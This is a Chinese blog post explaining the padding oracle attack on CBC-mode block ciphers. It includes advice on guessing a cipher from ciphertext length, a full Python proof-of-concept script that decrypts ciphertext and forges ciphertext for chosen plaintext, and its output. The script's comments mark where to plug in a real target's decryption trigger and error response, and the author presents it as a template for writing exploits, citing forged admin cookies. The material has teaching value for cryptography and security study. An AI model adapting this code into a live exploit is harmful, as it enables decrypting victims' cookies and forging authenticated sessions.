Padding Oracle Attack还是颇具威力的，ASP.NET的Padding Oracle Attack被Pwnie评为2010年最佳服务端漏洞之一。还是看 Juliano Rizzo and Thai Duong 的相关Paper。

另外就是padbuster这个工具也是针对padding oracle的自动化实现，而且作者写的文章也是阐述padding oracle攻击原理最好的一篇。云舒还根据此篇文章写了个学习笔记，英文不好的同学可以看看看看云舒的中文版。因为前人已经写得很好了，我在此就不深入讲padding oracle的原理了，而是讲讲一些实现方面的细节。

但padbuster这个工具在我看来并不好使，它与网络耦合太紧密了，为此我自己实现了一个padding oracle的自动化工具。自己实现一遍果然是加深理解的最好方法。在现实攻击中，只需要看懂了我的代码，并在适当的地方做些定制化的修改即可写出exploit，此举也可过滤掉一些scriptkids。连续花了三天，奋战数个小时，终于完成了这份POC代码，想算法死了不少脑细胞。写得过程中完全没有参考padbuster的code，纯粹是依据自己对padding oracle的理解而写成。另外因为工作环境的原因，我的注释是用英文写的。

Padding Oracle Attack能做什么?

padding oracle针对的是加密算法中的CBC Mode，当加密算法使用CBC Mode时，如果满足攻击条件，那么利用Padding Oracle能够在不知道密钥的情况下，解密任意密文，或者构造出任意明文的合法密文。

如果你不能理解这句话的话，那么想想ASP.NET 的padding oracle攻击，能够使得攻击者完全解密网站的Cookie，或者是构造一个admin的Cookie，只要你知道Cookie明文的格式。

需要注意的是，padding oracle针对的是CBC模式，而不是某一个加密算法，所以任何分组加密算法，只要使用了CBC模式，都会受到影响。此类加密算法包括AES、DES、3-DES、Blowfish。。。。。。

Padding Oracle Attack的条件

但padding oracle不是没有任何限制的，否则世界就乱套了。padding oracle attack的达成条件是

1. 攻击者能够获得密文（ciphertext），以及密文对应的IV（初始化向量）

2. 攻击者能够触发密文的解密过程，且能够知道密文的解密结果

对于第一点，密文是我们攻击的目标，从cookie、敏感数据等很多地方自然可以获得。

密码学里的IV，并没有保密性的要求，所以对于使用CBC-MODE的加密算法来说，IV经常会随着密文一起发送。常见的做法是将IV作为一个前缀，附着在密文的前面。对于CBC-MODE来说，IV的长度必须与分组的长度相等。

在实施攻击准备时，如果能够获知目标使用的加密算法，就能大大简化工作。所以这里插一些很有用的“题外话”，不感兴趣的朋友可以直接跳过此部分。

=============================================================

通过密文猜测加密算法的思路

在现实攻击中，遇到一堆看了就眼花的密文通常有着无处下手的感觉？也许下面我讲的这些思路能帮到你。

首先，要知道在一般的互联网应用中，要使用加密算法，有着各种各样的限制。

一个是性能的限制，使用性能不好的加密算法，甚至是增加key的长度，都可能会使得性能以几何级数下降，这是架构师所无法忍受的事情。

二是实现加密算法的第三方库，一般来说只有一些流行加密算法有着比较稳定的第三方函数库。

综合这些因素，在一般的互联网应用中，对称加密算法的使用离不开这么几种算法：

1.stream cipher（RC4、XOR之流）

2.分组加密算法中的DES、3-DES、AES、Blowfish等，且因为性能的问题，模式选择可能大多数是 ECB、CBC，因为CFB模式等可能导致性能消耗增加若干倍，是架构师所不愿意看到的事情。

3. 程序员自己实现的一些野鸡算法（这种是最挫的，任何一本讲应用密码学的书应该都写了一条原则：不要自己实现加密算法）。

其次，几种常见的加密算法还有一个特征，就是密文的长度。对于stream cipher来说，明文的长度和密文的长度是一样的，密文的长度是没有规律的，所以如果看到了奇数字节的密文，若不是密文还附加了别的东西，就几乎可以断定是stream cipher了。

而分组加密算法的block size和key size都是固定的，见下表：

因此我们拿到了密文后，可以通过对长度的判断，来猜测它用的是什么加密算法。

比如 AES 的密文，必然是16的整数倍长度，DES、3-DES等则是8的整数倍。

加密算法加密后产生的密文，很多是不可见字符，因此在实际应用中，一般会使用编码的形式将密文编码起来。常见的有两种编码方式

一种是base64：

7BXXmAWWXzHDJPHvw6ybqx+RIQxwDCJP.......

一种是将密文字符的16进制转化为ascii码，比如：

907EA2E95B5A832B6EC8D5C2757C3866A202CDC7231AF5669CBD762F1B7F8A0F  (64字节)

可能原本的密文是：

\x90\x7E\xA2\xE9\x5B\x5A......

所以这段密文的实际长度，应该是 64/2 = 32  字节。如果按照8字节(64 bit)分组，就是：

907EA2E95B5A832B

6EC8D5C2757C3866

A202CDC7231AF566

9CBD762F1B7F8A0F

其中第一组很可能是IV，也可能不是，因为服务端可能没有把IV附带在密文中。

如果服务端没有将IV附带在密文中，则IV的状态需要在服务端维护（或者写死在配置中），这种情况只适用于类似cookie这种情景，密文由服务端加密生成，又由服务端自己来解密，才能解得开。如果需要用到跨系统的调用，不附带IV，接收密文的一方即便有密钥，也是解不开密文的。

如果按照16字节(128bit)分组，则有可能是AES加密算法：

907EA2E95B5A832B6EC8D5C2757C3866

A202CDC7231AF5669CBD762F1B7F8A0F

最后，如果在知道明文的情况下，还可以通过改变明文的字节，来查看密文的变化。看是变动了几个字节，分组之间又有何关联，从而推断出密文使用的加密算法或是加密时选择的模式。关于这种技巧，推荐一篇文章，在此不深入讨论。

=============================================================

padding oracle attack的第二个条件，也是最关键的一个，是能够触发解密过程，且能够知道密文的解密结果。这是最为关键的一个条件。因为加密算法的加解密必须遵循一定的padding原则，如果padding不正确，则解密就可能不会成功。padding oracle attack就是通过验证解密时产生的明文是否符合padding的原则，来判断解密是否成功的。

padding的规则有很多种，在padding oracle attack中，使用的padding规则是 PKCS#5，它填充的每个字节值即为需要填充的字节数，即：

一般来说，解密时如果发现解密出来明文的padding不正确，解密函数可能会抛出一个异常；

如果解密出来明文的padding正确，则解密过程顺利完成。但在具体应用中，根据padding oracle解密出来的明文必然不是应用程序原本想要获得的结果，因此有可能出现一个业务上的自定义错误；

padding oracle attack正是利用了这两个错误之间的差异，来验证padding是否正确。所以能够验证解密后的结果，是padding oracle实施的必要条件。

在padbuster作者的文章中，他是通过服务端返回错误来验证的。如果服务端解密时发现padding错误，会抛出一个 500的错误：

而当服务端解密padding正确时，但解密出来的明文不符合业务期待，因此会抛一个200的自定义错误页面：

利用者两者间的差异，即可验证padding是否正确。

 自动化实现Padding Oracle Attack

了解了padding oracle的原理和条件后，就可以实现我们的padding oracle代码了。因为padding oracle的第二个条件，其本质是确认解密后的明文，是否满足PKCS#5的padding规则，因此在POC中，我写了一个函数验证明文的PKCS#5 padding是否正确。

我使用的python加密算法库（），在padding不正确时也根本没有抛出异常。但我们通过对解密后明文的验证，同样能够完成padding oracle攻击。

解密函数的触发，也是直接调用了加密算法函数进行的解密，但这并不影响我们POC padding oracle的过程。

如要改写为实际攻击可用的exploit，这两个部分是需要根据环境自己修改的。

在具体实施解密过程时，是一个block一个block去操作的。

Padding Oracle 还可以实现任意自定义明文的加密，返回可以解密成此明文的密文和IV。其原理主要是获取解密过程中的一个临时中间值。如果有多个block时，需要从最后一个block开始推导。

不断的从后往前推导出新的IV，也就推导出了我们想要的密文和最终需要的IV。

    代码如下：

最终的运行效果：

使用以下测试数据：

########################################

# you may config this part by yourself

iv = '12345678'   ===》 iv，随便自定义一个，需要和block size一样大小，我们需要这个值

plain = 'aaaaaaaaaaaaaaaaX'  ===》 原本的明文，17字节，因为padding后可以分成3组

plain_want = "opaas"     ===》希望通过padding oracle，得到解密为此明文的密文

# you can choose cipher: blowfish/AES/DES/DES3/CAST/ARC2

cipher = "blowfish"    ===》 加密算法选择

########################################

输出：

[root@vps tmp]#python padding_oracle.py

=== Padding Oracle Attack POC(CBC-MODE) ===

=== by axis ===

=== axis@ph4nt0m.org ===

=== 2011.9 ===

=== Generate Target Ciphertext ===

[+] plaintext is: aaaaaaaaaaaaaaaaX

[+] iv is: \x31\x32\x33\x34\x35\x36\x37\x38

[+] ciphertext is: \xd7\xe6\x5d\xc9\xd7\xbb\x49\xec\x61\xe2\x67\x7e\x1b\xba\x33\x85\x34\xfc\xcd\xe4\x9f\xaa\xe9\x72

=== Start Padding Oracle Decrypt ===

[+] Choosing Cipher: BLOWFISH

[*] Now try to decrypt block 0

[*] Block 0's ciphertext is: \xd7\xe6\x5d\xc9\xd7\xbb\x49\xec

[*] Try IV: \x00\x00\x00\x00\x00\x00\x00\x58

[*] Found padding oracle: \x50\x53\x52\x55\x54\x57\x56\x01

[*] Try IV: \x00\x00\x00\x00\x00\x00\x54\x5b

[*] Found padding oracle: \x50\x53\x52\x55\x54\x57\x02\x02

[*] Try IV: \x00\x00\x00\x00\x00\x54\x55\x5a

[*] Found padding oracle: \x50\x53\x52\x55\x54\x03\x03\x03

[*] Try IV: \x00\x00\x00\x00\x50\x53\x52\x5d

[*] Found padding oracle: \x50\x53\x52\x55\x04\x04\x04\x04

[*] Try IV: \x00\x00\x00\x50\x51\x52\x53\x5c

[*] Found padding oracle: \x50\x53\x52\x05\x05\x05\x05\x05

[*] Try IV: \x00\x00\x54\x53\x52\x51\x50\x5f

[*] Found padding oracle: \x50\x53\x06\x06\x06\x06\x06\x06

[*] Try IV: \x00\x54\x55\x52\x53\x50\x51\x5e

[*] Found padding oracle: \x50\x07\x07\x07\x07\x07\x07\x07

[*] Try IV: \x58\x5b\x5a\x5d\x5c\x5f\x5e\x51

[*] Found padding oracle: \x08\x08\x08\x08\x08\x08\x08\x08

[+] Block 0 decrypt!

[+] intermediary value is: \x50\x53\x52\x55\x54\x57\x56\x59

[+] The plaintext of block 0 is: aaaaaaaa

[*] Now try to decrypt block 1

[*] Block 1's ciphertext is: \x61\xe2\x67\x7e\x1b\xba\x33\x85

[*] Try IV: \x00\x00\x00\x00\x00\x00\x00\x8c

[*] Found padding oracle: \xb6\x87\x3c\xa8\xb6\xda\x28\x01

[*] Try IV: \x00\x00\x00\x00\x00\x00\x2a\x8f

[*] Found padding oracle: \xb6\x87\x3c\xa8\xb6\xda\x02\x02

[*] Try IV: \x00\x00\x00\x00\x00\xd9\x2b\x8e

[*] Found padding oracle: \xb6\x87\x3c\xa8\xb6\x03\x03\x03

[*] Try IV: \x00\x00\x00\x00\xb2\xde\x2c\x89

[*] Found padding oracle: \xb6\x87\x3c\xa8\x04\x04\x04\x04

[*] Try IV: \x00\x00\x00\xad\xb3\xdf\x2d\x88

[*] Found padding oracle: \xb6\x87\x3c\x05\x05\x05\x05\x05

[*] Try IV: \x00\x00\x3a\xae\xb0\xdc\x2e\x8b

[*] Found padding oracle: \xb6\x87\x06\x06\x06\x06\x06\x06

[*] Try IV: \x00\x80\x3b\xaf\xb1\xdd\x2f\x8a

[*] Found padding oracle: \xb6\x07\x07\x07\x07\x07\x07\x07

[*] Try IV: \xbe\x8f\x34\xa0\xbe\xd2\x20\x85

[*] Found padding oracle: \x08\x08\x08\x08\x08\x08\x08\x08

[+] Block 1 decrypt!

[+] intermediary value is: \xb6\x87\x3c\xa8\xb6\xda\x28\x8d

[+] The plaintext of block 1 is: aaaaaaaa

[*] Now try to decrypt block 2

[*] Block 2's ciphertext is: \x34\xfc\xcd\xe4\x9f\xaa\xe9\x72

[*] Try IV: \x00\x00\x00\x00\x00\x00\x00\x83

[*] Found padding oracle: \x39\xe5\x60\x79\x1c\xbd\x34\x01

[*] Try IV: \x00\x00\x00\x00\x00\x00\x36\x80

[*] Found padding oracle: \x39\xe5\x60\x79\x1c\xbd\x02\x02

[*] Try IV: \x00\x00\x00\x00\x00\xbe\x37\x81

[*] Found padding oracle: \x39\xe5\x60\x79\x1c\x03\x03\x03

[*] Try IV: \x00\x00\x00\x00\x18\xb9\x30\x86

[*] Found padding oracle: \x39\xe5\x60\x79\x04\x04\x04\x04

[*] Try IV: \x00\x00\x00\x7c\x19\xb8\x31\x87

[*] Found padding oracle: \x39\xe5\x60\x05\x05\x05\x05\x05

[*] Try IV: \x00\x00\x66\x7f\x1a\xbb\x32\x84

[*] Found padding oracle: \x39\xe5\x06\x06\x06\x06\x06\x06

[*] Try IV: \x00\xe2\x67\x7e\x1b\xba\x33\x85

[*] Found padding oracle: \x39\x07\x07\x07\x07\x07\x07\x07

[*] Try IV: \x31\xed\x68\x71\x14\xb5\x3c\x8a

[*] Found padding oracle: \x08\x08\x08\x08\x08\x08\x08\x08

[+] Block 2 decrypt!

[+] intermediary value is: \x39\xe5\x60\x79\x1c\xbd\x34\x82

[+] The plaintext of block 2 is: X

[+] Guess intermediary value is: \x50\x53\x52\x55\x54\x57\x56\x59\xb6\x87\x3c\xa8\xb6\xda\x28\x8d\x39\xe5\x60\x79\x1c\xbd\x34\x82

[+] plaintext = intermediary_value XOR original_IV

[+] Guess plaintext is: aaaaaaaaaaaaaaaaX

=== Start Padding Oracle Encrypt ===

[+] plaintext want to encrypt is: opaas

[+] Choosing Cipher: BLOWFISH

[*] After padding, plaintext becomes to: \x6f\x70\x61\x61\x73\x03\x03\x03

[+] Encrypt Success!

[+] The ciphertext you want is: \x34\xfc\xcd\xe4\x9f\xaa\xe9\x72

[+] IV is: \x56\x95\x01\x18\x6f\xbe\x37\x81

=== Let's verify the custom encrypt result ===

[+] Decrypt of ciphertext '\x34\xfc\xcd\xe4\x9f\xaa\xe9\x72' is:

opaas

[+] Bingo!

[root@vps tmp]#

 padding_oracle.py的源代码：

"""

Padding Oracle Attack POC(CBC-MODE)

Author: axis(axis@ph4nt0m.org)

http://hi.baidu.com/aullik5

2011.9

This program is based on Juliano Rizzo and Thai Duong's talk on

Practical Padding Oracle Attack.(http://netifera.com/research/)

For Education Purpose Only!!!

This program is free software: you can redistribute it and/or modify

it under the terms of the GNU General Public License as published by

the Free Software Foundation, either version 3 of the License, or

(at your option) any later version.

This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the

GNU General Public License for more details.

You should have received a copy of the GNU General Public License

along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""

import sys

# https://www.dlitz.net/software/pycrypto/

from Crypto.Cipher import *

import binascii

# the key for encrypt/decrypt

# we demo the poc here, so we need the key

# in real attack, you can trigger encrypt/decrypt in a complete blackbox env

ENCKEY = 'abcdefgh'

def main(args):

print

print "=== Padding Oracle Attack POC(CBC-MODE) ==="

print "=== by axis ==="

print "=== axis@ph4nt0m.org ==="

print "=== 2011.9 ==="

print

########################################

# you may config this part by yourself

iv = '12345678'

plain = 'aaaaaaaaaaaaaaaaX'

plain_want = "opaas"

# you can choose cipher: blowfish/AES/DES/DES3/CAST/ARC2

cipher = "blowfish"

########################################

block_size = 8

if cipher.lower() == "aes":

block_size = 16

if len(iv) != block_size:

print "[-] IV must be "+str(block_size)+" bytes long(the same as block_size)!"

return False

print "=== Generate Target Ciphertext ==="

ciphertext = encrypt(plain, iv, cipher)

if not ciphertext:

print "[-] Encrypt Error!"

return False

print "[+] plaintext is: "+plain

print "[+] iv is: "+hex_s(iv)

print "[+] ciphertext is: "+ hex_s(ciphertext)

print

print "=== Start Padding Oracle Decrypt ==="

print

print "[+] Choosing Cipher: "+cipher.upper()

guess = padding_oracle_decrypt(cipher, ciphertext, iv, block_size)

if guess:

print "[+] Guess intermediary value is: "+hex_s(guess["intermediary"])

print "[+] plaintext = intermediary_value XOR original_IV"

print "[+] Guess plaintext is: "+guess["plaintext"]

print

if plain_want:

print "=== Start Padding Oracle Encrypt ==="

print "[+] plaintext want to encrypt is: "+plain_want

print "[+] Choosing Cipher: "+cipher.upper()

en = padding_oracle_encrypt(cipher, ciphertext, plain_want, iv, block_size)

if en:

print "[+] Encrypt Success!"

print "[+] The ciphertext you want is: "+hex_s(en[block_size:])

print "[+] IV is: "+hex_s(en[:block_size])

print

print "=== Let's verify the custom encrypt result ==="

print "[+] Decrypt of ciphertext '"+ hex_s(en[block_size:]) +"' is:"

de = decrypt(en[block_size:], en[:block_size], cipher)

if de == add_PKCS5_padding(plain_want, block_size):

print de

print "[+] Bingo!"

else:

print "[-] It seems something wrong happened!"

return False

return True

else:

return False

def padding_oracle_encrypt(cipher, ciphertext, plaintext, iv, block_size=8):

# the last block

guess_cipher = ciphertext[0-block_size:]

plaintext = add_PKCS5_padding(plaintext, block_size)

print "[*] After padding, plaintext becomes to: "+hex_s(plaintext)

print

block = len(plaintext)

iv_nouse = iv # no use here, in fact we only need intermediary

prev_cipher = ciphertext[0-block_size:] # init with the last cipher block

while block > 0:

# we need the intermediary value

tmp = padding_oracle_decrypt_block(cipher, prev_cipher, iv_nouse, block_size, debug=False)

# calculate the iv, the iv is the ciphertext of the previous block

prev_cipher = xor_str( plaintext[block-block_size:block], tmp["intermediary"] )

#save result

guess_cipher = prev_cipher + guess_cipher

block = block - block_size

return guess_cipher

def padding_oracle_decrypt(cipher, ciphertext, iv, block_size=8, debug=True):

# split cipher into blocks; we will manipulate ciphertext block by block

cipher_block = split_cipher_block(ciphertext, block_size)

if cipher_block:

result = {}

result["intermediary"] = ''

result["plaintext"] = ''

counter = 0

for c in cipher_block:

if debug:

print "[*] Now try to decrypt block "+str(counter)

print "[*] Block "+str(counter)+"'s ciphertext is: "+hex_s(c)

print

# padding oracle to each block

guess = padding_oracle_decrypt_block(cipher, c, iv, block_size, debug)

if guess:

iv = c

result["intermediary"] += guess["intermediary"]

result["plaintext"] += guess["plaintext"]

if debug:

print

print "[+] Block "+str(counter)+" decrypt!"

print "[+] intermediary value is: "+hex_s(guess["intermediary"])

print "[+] The plaintext of block "+str(counter)+" is: "+guess["plaintext"]

print

counter = counter+1

else:

print "[-] padding oracle decrypt error!"

return False

return result

else:

print "[-] ciphertext's block_size is incorrect!"

return False

def padding_oracle_decrypt_block(cipher, ciphertext, iv, block_size=8, debug=True):

result = {}

plain = ''

intermediary = []  # list to save intermediary

iv_p = [] # list to save the iv we found

for i in range(1, block_size+1):

iv_try = []

iv_p = change_iv(iv_p, intermediary, i)

# construct iv

# iv = \x00...(several 0 bytes) + \x0e(the bruteforce byte) + \xdc...(the iv bytes we found)

for k in range(0, block_size-i):

iv_try.append("\x00")

# bruteforce iv byte for padding oracle

# 1 bytes to bruteforce, then append the rest bytes

iv_try.append("\x00")

for b in range(0,256):

iv_tmp = iv_try

iv_tmp[len(iv_tmp)-1] = chr(b)

iv_tmp_s = ''.join("%s" % ch for ch in iv_tmp)

# append the result of iv, we've just calculate it, saved in iv_p

for p in range(0,len(iv_p)):

iv_tmp_s += iv_p[len(iv_p)-1-p]

# in real attack, you have to replace this part to trigger the decrypt program

#print hex_s(iv_tmp_s) # for debug

plain = decrypt(ciphertext, iv_tmp_s, cipher)

#print hex_s(plain) # for debug

# got it!

# in real attack, you have to replace this part to the padding error judgement

if check_PKCS5_padding(plain, i):

if debug:

print "[*] Try IV: "+hex_s(iv_tmp_s)

print "[*] Found padding oracle: " + hex_s(plain)

iv_p.append(chr(b))

intermediary.append(chr(b ^ i))

break

plain = ''

for ch in range(0, len(intermediary)):

plain += chr( ord(intermediary[len(intermediary)-1-ch]) ^ ord(iv[ch]) )

result["plaintext"] = plain

result["intermediary"] = ''.join("%s" % ch for ch in intermediary)[::-1]

return result

# save the iv bytes found by padding oracle into a list

def change_iv(iv_p, intermediary, p):

for i in range(0, len(iv_p)):

iv_p[i] = chr( ord(intermediary[i]) ^ p)

return iv_p

def split_cipher_block(ciphertext, block_size=8):

if len(ciphertext) % block_size != 0:

return False

result = []

length = 0

while length < len(ciphertext):

result.append(ciphertext[length:length+block_size])

length += block_size

return result

def check_PKCS5_padding(plain, p):

if len(plain) % 8 != 0:

return False

# convert the string

plain = plain[::-1]

ch = 0

found = 0

while ch < p:

if plain[ch] == chr(p):

found += 1

ch += 1

if found == p:

return True

else:

return False

def add_PKCS5_padding(plaintext, block_size):

s = ''

if len(plaintext) % block_size == 0:

return plaintext

if len(plaintext) < block_size:

padding = block_size - len(plaintext)

else:

padding = block_size - (len(plaintext) % block_size)

for i in range(0, padding):

plaintext += chr(padding)

return plaintext

def decrypt(ciphertext, iv, cipher):

# we only need the padding error itself, not the key

# you may gain padding error info in other ways

# in real attack, you may trigger decrypt program

# a complete blackbox environment

key = ENCKEY

if cipher.lower() == "des":

o = DES.new(key, DES.MODE_CBC,iv)

elif cipher.lower() == "aes":

o = AES.new(key, AES.MODE_CBC,iv)

elif cipher.lower() == "des3":

o = DES3.new(key, DES3.MODE_CBC,iv)

elif cipher.lower() == "blowfish":

o = Blowfish.new(key, Blowfish.MODE_CBC,iv)

elif cipher.lower() == "cast":

o = CAST.new(key, CAST.MODE_CBC,iv)

elif cipher.lower() == "arc2":

o = ARC2.new(key, ARC2.MODE_CBC,iv)

else:

return False

if len(iv) % 8 != 0:

return False

if len(ciphertext) % 8 != 0:

return False

return o.decrypt(ciphertext)

def encrypt(plaintext, iv, cipher):

key = ENCKEY

if cipher.lower() == "des":

if len(key) != 8:

print "[-] DES key must be 8 bytes long!"

return False

o = DES.new(key, DES.MODE_CBC,iv)

elif cipher.lower() == "aes":

if len(key) != 16 and len(key) != 24 and len(key) != 32:

print "[-] AES key must be 16/24/32 bytes long!"

return False

o = AES.new(key, AES.MODE_CBC,iv)

elif cipher.lower() == "des3":

if len(key) != 16:

print "[-] Triple DES key must be 16 bytes long!"

return False

o = DES3.new(key, DES3.MODE_CBC,iv)

elif cipher.lower() == "blowfish":

o = Blowfish.new(key, Blowfish.MODE_CBC,iv)

elif cipher.lower() == "cast":

o = CAST.new(key, CAST.MODE_CBC,iv)

elif cipher.lower() == "arc2":

o = ARC2.new(key, ARC2.MODE_CBC,iv)

else:

return False

plaintext = add_PKCS5_padding(plaintext, len(iv))

return o.encrypt(plaintext)

def xor_str(a,b):

if len(a) != len(b):

return False

c = ''

for i in range(0, len(a)):

c += chr( ord(a[i]) ^ ord(b[i]) )

return c

def hex_s(str):

re = ''

for i in range(0,len(str)):

re += "\\x"+binascii.b2a_hex(str[i])

return re

if __name__ == "__main__":

main(sys.argv)

摘自：大风起兮云飞扬